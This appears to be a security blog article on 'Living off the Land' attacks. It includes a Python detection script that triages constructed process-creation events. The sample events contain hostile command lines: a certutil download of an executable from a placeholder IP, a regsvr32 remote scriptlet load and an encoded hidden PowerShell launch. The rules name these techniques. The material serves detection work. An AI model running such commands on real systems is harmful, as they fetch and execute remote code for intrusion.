An attacker planning to infiltrate a highly-secured building wouldn’t brazenly walk through the main entrance armed with a visible weapon, only to be caught by X-ray scanners and metal detectors. Instead, they would resort to more cunning methods, perhaps using objects found inside the building—like a knife from the kitchen—to carry out their attack after bypassing initial security checks.
This scenario finds its digital counterpart in a growing cybersecurity menace known as “Living off the Land” (LoL). Once the hallmark of state-sponsored hackers targeting major organizations, LoL attacks are increasingly adopted by ransomware gangs and other cybercriminals against small and medium-sized businesses.
What is ‘Living off the Land’?
The idea behind Living off the Land is to use the tools and programs already installed on the system to launch an attack. This comes with many advantages for the adversary: they do not need to develop and maintain malware; they do not need to host, download or deploy it on the system they are attacking; and signature-based antivirus will not flag a binary that is a legitimate part of the operating system. But the real advantage of LoL attacks is that they “blend in” and hide within the noise of legitimate work operations. Hiding in plain sight to evade detection not only confuses traditional security tools, but also means the activity will not look suspicious to an untrained eye reviewing it.
The Challenge of Detection
Protecting against LoL attacks is challenging yet essential. The cybersecurity industry has catalogued over 400 legitimate, pre-installed tools that attackers abuse in these attacks. Many of them are rarely used by system administrators or end-users, which suggests a straightforward solution: remove or restrict access to these tools. However, this approach is not always practical: many of these binaries are also relied upon by the operating system itself or by legitimate administration tooling.
To catch threats that are attempting to fly under the radar, organizations should shift their focus from traditional signature-based detection to broader log collection, behavioural analysis and anomaly detection. These approaches cannot be fully automated, because context is what separates legitimate use of a tool from malicious use: who ran it, from which parent process, with which arguments, and whether that is normal for the environment. Triage therefore requires human expertise and contextual understanding. This is where a Security Operations Center (SOC) makes the difference. Whether in-house or outsourced, the SOC receives alerts on suspicious behaviour or execution that have to be investigated; by knowing common threat-actor tradecraft, understanding the intent behind an execution and knowing what normal looks like in the organization, the SOC analyst is able to detect, block and prevent malicious use of legitimate files.
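As an added illustration of the contextual triage described above (this is example code written for this page, not a tool from the original article), the script below runs a handful of behavioural rules over constructed Sysmon/EDR-style process-creation records. The records, the user and host names, and the baseline of benign parent processes (here a fictional SCCM client that legitimately pulls content with certutil) are all assumptions made for the example. The point it demonstrates is that the same binary and the same arguments are suppressed in one context and surfaced to an analyst in another.

```python
"""Rule-based triage of process-creation events for LOLBin misuse.

Added example, not code from the original article. EVENTS below are
constructed records, not real logs, and BENIGN_DOWNLOADERS is an assumed
baseline for a fictional environment.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    user: str
    parent: str      # parent image name, lower-case
    image: str       # process image name, lower-case
    cmdline: str


# Constructed sample: legitimate admin activity mixed with LoL tradecraft.
# The -enc blob is a truncated, constructed base64 string, not a real payload.
EVENTS = [
    ProcEvent("CORP\\svc_sccm", "ccmexec.exe", "certutil.exe",
              "certutil.exe -urlcache -split -f http://intranet/patch.cab patch.cab"),
    ProcEvent("CORP\\jdoe", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcEvent("CORP\\jdoe", "explorer.exe", "certutil.exe",
              "certutil.exe -urlcache -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.exe"),
    ProcEvent("CORP\\admin1", "cmd.exe", "regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"),
    ProcEvent("CORP\\admin1", "cmd.exe", "ipconfig.exe", "ipconfig.exe /all"),
    ProcEvent("CORP\\jdoe", "excel.exe", "splwow64.exe", "splwow64.exe 12288"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL = re.compile(r"https?://", re.IGNORECASE)

# Assumed baseline: in this fictional environment the SCCM client account is
# expected to download content with certutil, so that parent/user pair is normal.
BENIGN_DOWNLOADERS = {("ccmexec.exe", "CORP\\svc_sccm")}


def rule_office_child(ev: ProcEvent) -> bool:
    """An Office application spawning a script host is rarely user-driven."""
    return ev.parent in OFFICE and ev.image in SCRIPT_HOSTS


def rule_certutil_download(ev: ProcEvent) -> bool:
    """certutil -urlcache fetches a remote file; alert unless the parent/user is baselined."""
    if ev.image != "certutil.exe" or "-urlcache" not in ev.cmdline.lower():
        return False
    return (ev.parent, ev.user) not in BENIGN_DOWNLOADERS


def rule_regsvr32_remote(ev: ProcEvent) -> bool:
    """regsvr32 pointed at a URL loads a remote scriptlet instead of a local DLL."""
    return ev.image == "regsvr32.exe" and URL.search(ev.cmdline) is not None


def rule_encoded_powershell(ev: ProcEvent) -> bool:
    """-e / -ec / -enc / -EncodedCommand hides the script body from casual review."""
    if ev.image != "powershell.exe":
        return False
    return re.search(r"(?i)\s-e(c|nc|ncodedcommand)?\b", ev.cmdline) is not None


RULES = {
    "office_spawns_script_host": rule_office_child,
    "certutil_download_outside_baseline": rule_certutil_download,
    "regsvr32_remote_scriptlet": rule_regsvr32_remote,
    "powershell_encoded_command": rule_encoded_powershell,
}


def triage(events):
    """Return (event_index, rule_name) pairs an analyst should look at."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, rule_name in triage(EVENTS):
        ev = EVENTS[idx]
        print(f"[{rule_name}] {ev.user} {ev.parent} -> {ev.cmdline}")
```

Note what is and is not flagged: the SCCM-driven certutil download and the Excel-spawned print helper pass silently because they match the environment's baseline, while the same certutil arguments launched from a user's Explorer session, the Office-spawned encoded PowerShell, and the regsvr32 call pointed at a URL are surfaced. Rules like these generate the alert; deciding whether the flagged execution was an administrator's shortcut or an intrusion is still the analyst's job.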
While Living off the Land attacks are not new, their increasing prevalence poses a significant threat to organizations of all sizes. Fortunately, because the threat is not new, techniques for protecting our environments already exist; they now just have to be implemented everywhere.